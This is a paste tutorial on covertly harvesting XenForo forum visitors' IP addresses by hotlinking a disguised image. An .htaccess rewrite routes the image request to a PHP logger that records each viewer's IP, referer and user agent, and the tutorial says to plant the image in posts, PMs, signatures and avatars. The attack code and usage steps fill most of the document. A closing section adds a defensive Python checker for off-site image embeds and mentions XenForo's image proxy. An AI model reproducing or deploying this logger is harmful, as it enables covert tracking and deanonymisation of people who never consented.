Xenforo Vulnerability

a guest
Apr 2nd, 2020
Xenforo vulnerability: get a visitor's IP as an external user, not a sysadmin.


READ THIS TUTORIAL MADE BY TTG_POPEYES

Or... just use Grabify (https://grabify.link/image)

Step 1.)

Find a free webhost you can use.

The one I use is FreeHostia.com
Just register for a free account there.

--

Step 2.)

Make a new web directory
example: [ Register or Signin to view external links. ]

--

Step 3.)

Create a new file named:

.htaccess

--

Step 4.)

Put this code in .htaccess

Code:
RewriteEngine on
RewriteRule ^image.gif$ iplogger.php

Where it says: image.gif

You can change it to where you've uploaded your image; it doesn't matter what image, and it can be any image type such as gif, jpeg, png, etc.

Where it says: iplogger.php

That is the PHP file that will contain the IP logging code; name it whatever you want.

--

Step 5.)

Create an empty iplogger.php file (or whatever you named it)

And put in this code:

Code:
<?php
// Log file that every request to the rewritten image is appended to.
$log = 'logger.html';
$ip = $_SERVER['REMOTE_ADDR'];
$page = $_SERVER['REQUEST_URI'];
// Referer and User-Agent are optional headers; default to '' so a missing one does not raise a notice.
$refer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$date_time = date("l j F Y g:ia", time() - date("Z"));
$agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$fp = fopen($log, "a");
// Take the lock BEFORE writing (the original called flock(..., 3), which is LOCK_UN, after the write).
flock($fp, LOCK_EX);
// Escape the header values: they are chosen by whoever requests the image, and the log is opened as HTML.
fputs($fp, "<b>" . htmlspecialchars($date_time) . "</b> <br>"
    . "<b>IP: </b>" . htmlspecialchars($ip) . "<br>"
    . "<b>Page: </b>" . htmlspecialchars($page) . "<br>"
    . "<b>Refer: </b>" . htmlspecialchars($refer) . "<br>"
    . "<b>Useragent: </b>" . htmlspecialchars($agent) . " <br><br>\n");
flock($fp, LOCK_UN);
fclose($fp);
?>

Then create an empty:

logger.html file

--

Step 6.)

Upload your image.gif file (or whatever you named it)

if you haven't already

--

Step 7.)

Go to a forum or wherever you would like

And insert the image using:

Code:
[ Register or Signin to view external links. ]

You can insert this in:

- PMs
- Posts & threads
- Signatures
- Avatars
- And anything else that allows external linking of images.

If you would like to insert your image using HTML, where it is allowed, use this code:

Code:
<IMG SRC="http://site.com/directory/image.gif">

--

Step 8.)

Check your: [ Register or Signin to view external links. ]

for all your IP logs, including where they came from.

--

How it WORKS:

Basically,

when a browser requests the image in the directory that holds the .htaccess file,

the rewrite rule serves iplogger.php in place of image.gif, so the request (and the requester's IP) reaches the PHP script instead of a static image.



Step 9.)

Insert this URL inside a post in Xenforo using IMAGE BY URL (https://m.imgur.com/a/t91Qba7)

And wait for people to view it. It's more social engineering than anything, using a website's reputation to obtain IPs.

~ GhostyCeh
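The technique above only works because the forum embeds the image by URL, so every visitor's browser fetches it directly from the third-party host, and because the rewritten URL returns PHP output rather than image bytes. As an added example from the forum operator's side (not part of the original paste), here is a small Python checker: it lists the image URLs in a post that point off-site, and it tests whether what an image URL actually returned carries a real image signature, which the rewritten iplogger.php response does not. The allowlist, the sample post and the sample responses are constructed for this example; the URL http://site.com/directory/image.gif is the one the tutorial uses.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist: hosts this forum is willing to embed images from.
ALLOWED_IMAGE_HOSTS = {"forum.example", "cdn.forum.example"}

# Both embedding syntaxes the tutorial mentions: [img]...[/img] BBCode and <IMG SRC="...">.
IMG_BBCODE = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
IMG_HTML = re.compile(r"<img\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def find_external_images(post_text, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return the image URLs in a post whose host is not on the allowlist."""
    urls = IMG_BBCODE.findall(post_text) + IMG_HTML.findall(post_text)
    external = []
    for url in urls:
        url = url.strip()
        host = urlparse(url).hostname
        if host is None or host.lower() not in allowed_hosts:
            external.append(url)
    return external


# Magic bytes for the image types the tutorial says the hotlinked file may be.
IMAGE_SIGNATURES = {
    "image/gif": (b"GIF87a", b"GIF89a"),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
}


def looks_like_image(content_type, body):
    """True only if the declared Content-Type is an image type AND the body starts with its signature.

    A URL rewritten to a PHP script answers with text/html (PHP's default) and no image bytes,
    so it fails on both counts; a script that fakes the header still fails the signature check.
    """
    ctype = content_type.split(";")[0].strip().lower()
    signatures = IMAGE_SIGNATURES.get(ctype)
    if signatures is None:
        return False
    return any(body.startswith(sig) for sig in signatures)


def audit_responses(responses):
    """Given {url: (content_type, body)} as fetched by the forum server, return URLs that are not real images."""
    return [url for url, (ctype, body) in responses.items() if not looks_like_image(ctype, body)]


# Constructed sample post: one allowlisted image, one hotlinked from the tutorial's host.
SAMPLE_POST = (
    "Check out the new logo [img]http://cdn.forum.example/logo.png[/img]\n"
    'and this one: <IMG SRC="http://site.com/directory/image.gif">'
)

# Constructed sample responses: what each URL returned when the server (not the visitor) fetched it.
SAMPLE_RESPONSES = {
    "http://cdn.forum.example/logo.png": ("image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    # The rewritten image.gif: PHP's default text/html header and the whitespace the script echoes.
    "http://site.com/directory/image.gif": ("text/html; charset=UTF-8", b" \n"),
}


if __name__ == "__main__":
    print("Off-site images in post:", find_external_images(SAMPLE_POST))
    print("URLs that did not return an image:", audit_responses(SAMPLE_RESPONSES))
```

The design point is that the check is done by the forum server, not the visitor's browser: XenForo ships an image proxy option that fetches external images server-side for exactly this reason, so the visitor's IP never reaches the third-party host, and an operator who cannot proxy can at least refuse embeds whose host is off the allowlist or whose response does not carry image bytes.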